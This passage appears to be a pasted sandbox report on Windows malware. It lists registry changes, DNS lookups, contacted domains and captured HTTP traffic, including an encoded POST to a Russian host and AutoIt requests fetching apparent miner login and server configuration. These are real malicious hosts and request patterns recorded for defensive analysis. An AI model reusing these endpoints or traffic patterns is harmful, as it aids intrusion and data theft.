  2735. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPLink-List\\0\\Enabled",
  2736. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPLink-List\\0\\NoOverride",
  2737. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPLink-List\\0\\DsPath",
  2738. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPLink-List\\0\\SOM",
  2739. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Site-Name",
  2740. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Distinguished-Name",
  2741. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\SlowLink",
  2742. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPO-List",
  2743. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPO-List\\0",
  2744. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPO-List\\0\\Version",
  2745. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPO-List\\0\\WQLFilterPass",
  2746. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPO-List\\0\\AccessDenied",
  2747. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPO-List\\0\\GPO-Disabled",
  2748. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPO-List\\0\\Options",
  2749. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPO-List\\0\\GPOID",
  2750. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPO-List\\0\\SOM",
  2751. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPO-List\\0\\DisplayName",
  2752. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPO-List\\0\\WQL-Id",
  2753. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Loopback-GPO-List",
  2754. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPLink-List",
  2755. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPLink-List\\0",
  2756. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPLink-List\\0\\Enabled",
  2757. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPLink-List\\0\\NoOverride",
  2758. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPLink-List\\0\\DsPath",
  2759. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\GPLink-List\\0\\SOM",
  2760. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Loopback-GPLink-List",
  2761. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Extension-List\\00000000-0000-0000-0000-000000000000\\StartTimeLo",
  2762. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Extension-List\\00000000-0000-0000-0000-000000000000\\StartTimeHi",
  2763. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Extension-List\\00000000-0000-0000-0000-000000000000\\EndTimeLo",
  2764. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Extension-List\\00000000-0000-0000-0000-000000000000\\EndTimeHi",
  2765. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Extension-List\\00000000-0000-0000-0000-000000000000\\Status",
  2766. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Extension-List\\00000000-0000-0000-0000-000000000000\\LoggingStatus",
  2767. "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\PolicyOverdue",
  2768. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\00000000-0000-0000-0000-000000000000\\StartTimeLo",
  2769. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\00000000-0000-0000-0000-000000000000\\StartTimeHi",
  2770. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\00000000-0000-0000-0000-000000000000\\EndTimeLo",
  2771. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\00000000-0000-0000-0000-000000000000\\EndTimeHi",
  2772. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\00000000-0000-0000-0000-000000000000\\Status",
  2773. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\00000000-0000-0000-0000-000000000000\\LoggingStatus",
  2774. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\PolicyOverdue"
  2775.  
  2776.  
  2777. * Deleted Registry Keys:
  2778. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyOverride",
  2779. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL",
  2780. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  2781. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  2782. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
  2783. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
  2784. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\Adobe Acrobat Update Task.job",
  2785. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\Adobe Acrobat Update Task.job.fp",
  2786. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\Adobe Flash Player NPAPI Notifier.job",
  2787. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\Adobe Flash Player NPAPI Notifier.job.fp",
  2788. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\GoogleUpdateTaskMachineCore.job",
  2789. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\GoogleUpdateTaskMachineCore.job.fp",
  2790. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\GoogleUpdateTaskMachineUA.job",
  2791. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\GoogleUpdateTaskMachineUA.job.fp"
  2792.  
  2793.  
  2794. * DNS Communications:
  2795.  
  2796. "type": "A",
  2797. "request": "ip-api.com",
  2798. "answers":
  2799.  
  2800. "data": "72.11.140.50",
  2801. "type": "A"
  2802.  
  2803.  
  2804. "data": "66.212.29.250",
  2805. "type": "A"
  2806.  
  2807.  
  2808.  
  2809.  
  2810. "type": "A",
  2811. "request": "ih1667924.myihor.ru",
  2812. "answers":
  2813.  
  2814. "data": "193.124.178.83",
  2815. "type": "A"
  2816.  
  2817.  
  2818.  
  2819.  
  2820. "type": "A",
  2821. "request": "iplogger.org",
  2822. "answers":
  2823.  
  2824. "data": "88.99.66.31",
  2825. "type": "A"
  2826.  
  2827.  
  2828.  
  2829.  
  2830. "type": "A",
  2831. "request": "freemail.freehost.com.ua",
  2832. "answers":
  2833.  
  2834. "data": "194.0.200.251",
  2835. "type": "A"
  2836.  
  2837.  
  2838.  
  2839.  
  2840. "type": "A",
  2841. "request": "rms-server.tektonit.ru",
  2842. "answers":
  2843.  
  2844. "data": "109.234.156.182",
  2845. "type": "A"
  2846.  
  2847.  
  2848.  
  2849.  
  2850. "type": "A",
  2851. "request": "taskhostw.com",
  2852. "answers":
  2853.  
  2854. "data": "194.67.196.43",
  2855. "type": "A"
  2856.  
  2857.  
  2858.  
  2859.  
  2860. "type": "A",
  2861. "request": "windrvs.com",
  2862. "answers":
  2863.  
  2864. "data": "185.127.24.188",
  2865. "type": "A"
  2866.  
  2867.  
  2868.  
  2869.  
  2870.  
  2871. * Domains:
  2872.  
  2873. "ip": "109.234.156.182",
  2874. "domain": "rms-server.tektonit.ru"
  2875.  
  2876.  
  2877. "ip": "88.99.66.31",
  2878. "domain": "iplogger.org"
  2879.  
  2880.  
  2881. "ip": "185.127.24.188",
  2882. "domain": "windrvs.com"
  2883.  
  2884.  
  2885. "ip": "193.124.178.83",
  2886. "domain": "ih1667924.myihor.ru"
  2887.  
  2888.  
  2889. "ip": "194.67.196.43",
  2890. "domain": "taskhostw.com"
  2891.  
  2892.  
  2893. "ip": "194.0.200.251",
  2894. "domain": "freemail.freehost.com.ua"
  2895.  
  2896.  
  2897. "ip": "66.212.29.250",
  2898. "domain": "ip-api.com"
  2899.  
  2900.  
  2901.  
  2902. * Network Communication - ICMP:
  2903.  
  2904. * Network Communication - HTTP:
  2905.  
  2906. "count": 2,
  2907. "body": "",
  2908. "uri": "http://ip-api.com/json",
  2909. "user-agent": "AutoIt",
  2910. "method": "GET",
  2911. "host": "ip-api.com",
  2912. "version": "1.1",
  2913. "path": "/json",
  2914. "data": "GET /json HTTP/1.1\r\nUser-Agent: AutoIt\r\nHost: ip-api.com\r\nCache-Control: no-cache\r\n\r\n",
  2915. "port": 80
  2916.  
  2917.  
  2918. "count": 1,
  2919. "body": "\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
  2920. "uri": "http://ih1667924.myihor.ru/index.php",
  2921. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
  2922. "method": "POST",
  2923. "host": "ih1667924.myihor.ru",
  2924. "version": "1.1",
  2925. "path": "/index.php",
  2926. "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: ih1667924.myihor.ru\r\nContent-Length: 107\r\nCache-Control: no-cache\r\n\r\n\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
  2927. "port": 80
  2928.  
  2929.  
  2930. "count": 1,
  2931. "body": "",
  2932. "uri": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D",
  2933. "user-agent": "Microsoft-CryptoAPI/6.1",
  2934. "method": "GET",
  2935. "host": "ocsp.usertrust.com",
  2936. "version": "1.1",
  2937. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D",
  2938. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D HTTP/1.1\r\nCache-Control: max-age = 94765\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Mon, 11 Mar 2019 04:19:13 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.usertrust.com\r\n\r\n",
  2939. "port": 80
  2940.  
  2941.  
  2942. "count": 1,
  2943. "body": "",
  2944. "uri": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCECsuburZdTZsFIpu26N8jAc%3D",
  2945. "user-agent": "Microsoft-CryptoAPI/6.1",
  2946. "method": "GET",
  2947. "host": "ocsp.comodoca.com",
  2948. "version": "1.1",
  2949. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCECsuburZdTZsFIpu26N8jAc%3D",
  2950. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCECsuburZdTZsFIpu26N8jAc%3D HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.comodoca.com\r\n\r\n",
  2951. "port": 80
  2952.  
  2953.  
  2954. "count": 1,
  2955. "body": "",
  2956. "uri": "http://ocsp.comodoca.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBR64T7ooMQqLLQoy%2BemBUYZQOKh6QQUkK9qOpRaC9iQ6hJWc99DtDoo2ucCEQD%2BofQtYJP0vg6JS%2B4x27Bg",
  2957. "user-agent": "Microsoft-CryptoAPI/6.1",
  2958. "method": "GET",
  2959. "host": "ocsp.comodoca.com",
  2960. "version": "1.1",
  2961. "path": "/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBR64T7ooMQqLLQoy%2BemBUYZQOKh6QQUkK9qOpRaC9iQ6hJWc99DtDoo2ucCEQD%2BofQtYJP0vg6JS%2B4x27Bg",
  2962. "data": "GET /MFIwUDBOMEwwSjAJBgUrDgMCGgUABBR64T7ooMQqLLQoy%2BemBUYZQOKh6QQUkK9qOpRaC9iQ6hJWc99DtDoo2ucCEQD%2BofQtYJP0vg6JS%2B4x27Bg HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.comodoca.com\r\n\r\n",
  2963. "port": 80
  2964.  
  2965.  
  2966. "count": 1,
  2967. "body": "",
  2968. "uri": "http://ih1667924.myihor.ru/index.php",
  2969. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
  2970. "method": "POST",
  2971. "host": "ih1667924.myihor.ru",
  2972. "version": "1.1",
  2973. "path": "/index.php",
  2974. "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: ih1667924.myihor.ru\r\nContent-Length: 9687\r\nCache-Control: no-cache\r\n\r\n",
  2975. "port": 80
  2976.  
  2977.  
  2978. "count": 1,
  2979. "body": "",
  2980. "uri": "http://taskhostw.com/randomx/STATUS.html",
  2981. "user-agent": "AutoIt",
  2982. "method": "GET",
  2983. "host": "taskhostw.com",
  2984. "version": "1.1",
  2985. "path": "/randomx/STATUS.html",
  2986. "data": "GET /randomx/STATUS.html HTTP/1.1\r\nUser-Agent: AutoIt\r\nHost: taskhostw.com\r\nCache-Control: no-cache\r\n\r\n",
  2987. "port": 80
  2988.  
  2989.  
  2990. "count": 1,
  2991. "body": "",
  2992. "uri": "http://taskhostw.com/randomx/loaderTOP.html",
  2993. "user-agent": "AutoIt",
  2994. "method": "GET",
  2995. "host": "taskhostw.com",
  2996. "version": "1.1",
  2997. "path": "/randomx/loaderTOP.html",
  2998. "data": "GET /randomx/loaderTOP.html HTTP/1.1\r\nUser-Agent: AutoIt\r\nHost: taskhostw.com\r\nCache-Control: no-cache\r\n\r\n",
  2999. "port": 80
  3000.  
  3001.  
  3002. "count": 1,
  3003. "body": "",
  3004. "uri": "http://taskhostw.com/randomx/Login.html",
  3005. "user-agent": "AutoIt",
  3006. "method": "GET",
  3007. "host": "taskhostw.com",
  3008. "version": "1.1",
  3009. "path": "/randomx/Login.html",
  3010. "data": "GET /randomx/Login.html HTTP/1.1\r\nUser-Agent: AutoIt\r\nHost: taskhostw.com\r\nCache-Control: no-cache\r\n\r\n",
  3011. "port": 80
  3012.  
  3013.  
  3014. "count": 1,
  3015. "body": "",
  3016. "uri": "http://taskhostw.com/randomx/Password.html",
  3017. "user-agent": "AutoIt",
  3018. "method": "GET",
  3019. "host": "taskhostw.com",
  3020. "version": "1.1",
  3021. "path": "/randomx/Password.html",
  3022. "data": "GET /randomx/Password.html HTTP/1.1\r\nUser-Agent: AutoIt\r\nHost: taskhostw.com\r\nCache-Control: no-cache\r\n\r\n",
  3023. "port": 80
  3024.  
  3025.  
  3026. "count": 1,
  3027. "body": "",
  3028. "uri": "http://taskhostw.com/randomx/Server.html",
  3029. "user-agent": "AutoIt",
  3030. "method": "GET",
  3031. "host": "taskhostw.com",
  3032. "version": "1.1",
  3033. "path": "/randomx/Server.html",
  3034. "data": "GET /randomx/Server.html HTTP/1.1\r\nUser-Agent: AutoIt\r\nHost: taskhostw.com\r\nCache-Control: no-cache\r\n\r\n",
  3035. "port": 80
  3036.  
  3037.  
  3038. "count": 1,
  3039. "body": "",
  3040. "uri": "http://taskhostw.com/randomx/configCPUX.html",
  3041. "user-agent": "AutoIt",
  3042. "method": "GET",
  3043. "host": "taskhostw.com",
  3044. "version": "1.1",
  3045. "path": "/randomx/configCPUX.html",
  3046. "data": "GET /randomx/configCPUX.html HTTP/1.1\r\nUser-Agent: AutoIt\r\nHost: taskhostw.com\r\nCache-Control: no-cache\r\n\r\n",
  3047. "port": 80
  3048.  
  3049.  
  3050.  
  3051. * Network Communication - SMTP:
  3052.  
  3053. * Network Communication - Hosts:
  3054.  
  3055. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment